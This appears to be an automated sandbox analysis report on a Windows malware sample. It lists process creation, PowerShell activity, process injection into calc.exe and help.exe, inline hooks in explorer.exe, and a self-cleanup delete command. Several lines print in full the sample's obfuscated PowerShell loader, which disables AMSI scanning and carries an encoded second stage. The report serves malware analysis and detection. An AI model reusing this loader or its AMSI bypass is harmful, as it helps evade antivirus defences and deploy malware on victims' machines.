          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,Jump to behavior
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,Jump to behavior
          Source: s2rsXUiUn8.exeStatic PE information: section name: .xdata
          Source: s2rsXUiUn8.exeStatic PE information: section name: .vmp0
          Source: s2rsXUiUn8.exeStatic PE information: section name: .cobf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041682D push es; retf 9_2_00416836
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0040102E push esp; iretd 9_2_0040102F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041A1B1 push ecx; iretd 9_2_0041A1B9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEF2 push eax; ret 9_2_0041CEF8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEFB push eax; ret 9_2_0041CF62
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEA5 push eax; ret 9_2_0041CEF8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CF5C push eax; ret 9_2_0041CF62
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_004177B7 push ebp; retf 9_2_004177B8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033FD0D1 push ecx; ret 9_2_033FD0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ADD0D1 push ecx; ret 19_2_02ADD0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B682D push es; retf 19_2_001B6836
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BA1B1 push ecx; iretd 19_2_001BA1B9
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BD4A2 push FFFFFFB8h; retf 19_2_001BD4BC
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEA5 push eax; ret 19_2_001BCEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEFB push eax; ret 19_2_001BCF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEF2 push eax; ret 19_2_001BCEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCF5C push eax; ret 19_2_001BCF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B77B7 push ebp; retf 19_2_001B77B8
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
